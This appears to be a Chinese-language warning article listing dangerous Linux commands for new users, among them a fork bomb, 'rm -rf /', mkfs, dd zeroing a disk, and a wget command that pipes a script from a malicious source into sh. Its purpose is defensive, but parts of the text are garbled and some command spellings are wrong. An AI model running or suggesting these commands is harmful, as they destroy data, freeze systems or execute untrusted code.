Linux Shell/terminal命令非常強(qiáng)大�,即使一個簡單的命令就可能導(dǎo)致文件夾��、文件或者路徑文件夾等被刪除。
在一些情況下��,Linux甚至不會詢問你而直接執(zhí)行命令�,導(dǎo)致你丟失各種數(shù)據(jù)信息��。
一般來說在Web上推薦新的Linux用戶執(zhí)行這些命令��,當(dāng)然���,也有人哪些寫過這代碼的人不這么想���,因為這玩意你一寫下去就不是玩笑了。
這里我收集了一些對系統(tǒng)有危害的Linux代碼��,幫助你避免他們����。請記住:這些代碼非常危險,甚至可以經(jīng)過修改���,變得更加有危害性�����。
還有一些事情需要注意:一些命令只在Ubuntu中有sudo前綴時是有危害的����。其他發(fā)行版本的Linux�����,則是在作為根目錄命令時會有危害�。
1、Linux Fork Bomb Command
: (){ :: };:以Fork Bomb聞名�����,是一個拒絕服務(wù)攻擊的Linux系統(tǒng)���。: (){ :: };:是一個bash函數(shù)�。只要被執(zhí)行�,他會不斷重復(fù)�,直到系統(tǒng)被凍結(jié)�����。
你只能重啟系統(tǒng)解決這個問題�。所以當(dāng)你在Linux界面執(zhí)行這個命令時一定要注意。
2��、Mv Folder/Dev/Null Command
mv folder/dev/null也是一個危險的命令�����。Dev/null或者null device是一個刪除所有寫在這個設(shè)備文件上數(shù)據(jù)的設(shè)備文件��,但是�����,該操作提示卻是寫入操作執(zhí)行成功���。這就是我們常說的bit bucked或者black hole。
3���、Rm -Rf Command
rm -rf命令在Linux系統(tǒng)中可以快速刪除文件夾及其內(nèi)容�。如果,你不知道如何正確使用它����,你就只有哭了。
以下為m-rf命令最常見的組合和選擇:
rm command:刪除Linux系統(tǒng)的文件
rm -f command:不需提示�����,刪除文件中的只讀文件
rm -r command:循環(huán)刪除文件夾的內(nèi)容
rm -d command:刪除空目錄���,如果非空目錄則不會執(zhí)行該操作
rm -rf/ command:強(qiáng)制刪除根目錄中的所有內(nèi)容和子文件夾(包括寫保護(hù)文件)命令
rm -rf* command:強(qiáng)制刪除當(dāng)前目錄中的所有內(nèi)容(當(dāng)前工作目錄)和字文件夾
rm -rf. command:強(qiáng)制刪除當(dāng)前文件夾目錄/子目錄中的所有內(nèi)容���。同rm -r.[^.]*
The rm -r.[^.]* command:刪除文件及文件夾,帶有刪除提示
4����、Mkfs Command
如果你不知mkfs的作用,那么它也是一個危險的命令�����,mkfs之后寫的任何命令都將會被一個空白的linux文件系統(tǒng)格式化����、替代����。
下面列舉出需要管理員權(quán)限����,格式化硬盤的命令:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
mkfs.cramfs也可以和上面的代碼做同樣的事情,不過不需要管理源權(quán)限�����。
5��、Tar Bomb
tar命令用于將多個文件以.tar格式放入一個文件中(存檔文件)��。Tape Archive (Tar) bomb可以由他創(chuàng)建���。
當(dāng)為壓縮時����,就是這個存檔文件生成數(shù)以萬計的相似名稱文件出現(xiàn)在當(dāng)前目錄中而不是新目錄���。
當(dāng)收到tar文件,定期創(chuàng)建一個新的保護(hù)目錄���,然后在解壓前將接受的tar文件放到這個目錄中����,你可以避免成為tar bomb的受害者。
6��、Dd Command
Dd命令用于復(fù)制改變硬盤分區(qū)���。如果���,你用錯地方了,那么也很危險�。
下面列舉dd命令:
dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
下面這個命令會將整個主硬盤清零:dd if=/dev/zero of=/dev/had
7、Shell Script Code
有時候����,你可能會被人坑,給你一個shell腳本文件���,讓你去下載并執(zhí)行它�。該腳本可能會包含一些惡意的或危險的代碼����。命令形式可能會是這樣:wget http://some_malicious_source -O- sh���。wget將會在sh狹隘腳本時下載腳本。
8�����、Malicious Source Code
也許有人會給你源代碼讓你編譯他���。代碼可能是正常代碼���,不過,有一些惡意代碼偽裝在大型源代碼中���,如果是這樣�,你的系統(tǒng)就中槍了���。如何避免����?僅接受并編譯可信賴來源的源代碼�����。
9�、Decompression Bomb
你已經(jīng)收到一個壓縮文件,你被要求提取這個看起來很小的文件�����,可能小到KB�����。事實上�����,該小尺寸的壓縮文件包含高度壓縮數(shù)據(jù)���。
只要文件解壓�,上百GB數(shù)據(jù)會被提取��,這時候��,過大的數(shù)據(jù)填滿硬盤導(dǎo)致宕機(jī)�,幾率就很大了。如何避免?還是那句老話����,別手賤,什么文件都去接收��,請接收可信任來源文件�。
